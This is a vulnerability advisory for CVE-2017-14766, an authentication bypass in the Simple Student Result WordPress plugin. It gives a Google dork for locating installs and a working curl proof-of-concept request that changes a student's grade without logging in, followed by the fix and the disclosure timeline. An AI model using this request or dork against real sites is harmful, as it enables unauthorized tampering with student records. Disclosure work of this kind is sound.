Exploit Title: Simple Student Result < 1.6.4 - Auth Bypass
Google Dork: inurl:wp-content/plugins/simple-student-result
Date: 21-Sep-17
Exploit Author: Benjamin Lim
Vendor Homepage: https://ssr.saadamin.com/
Software Link: https://wordpress.org/plugins/simple-student-result/
Version: < 1.6.4
Tested on: Kali Linux 2.0
CVE : CVE-2017-14766

1. Product & Service Introduction:

Simple Student Result is a Wordpress plugin for managing student results. Administrators can create/update/delete results while unauthenticated users can lookup results by providing a student id number. As of now, the plugin has been downloaded 12,000 times and has 700+ active installs.

2. Technical Details & Description:

Authentication Bypass vulnerability in the Wordpress Simple Student Result plugin 1.6.3 allows unauthenticated attackers to update or delete student records with knowledge of only the student id number. The fn_ssr_add_st_submit() function and fn_ssr_del_st_submit() function in functions.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to modify the records.

3. Proof of Concept (PoC):

To update student id 123's CGPA to 5.0:
curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' 'https://localhost/wp-admin/admin-ajax.php'

4. Mitigation

Update to version 1.6.4

5. Disclosure Timeline

2017/09/20 Vendor contacted
2017/09/20 Vendor responded
2017/09/21 Update released
2017/09/21 Advisory released to the public

6. Credits & Authors:

Benjamin Lim - [https://limbenjamin.com]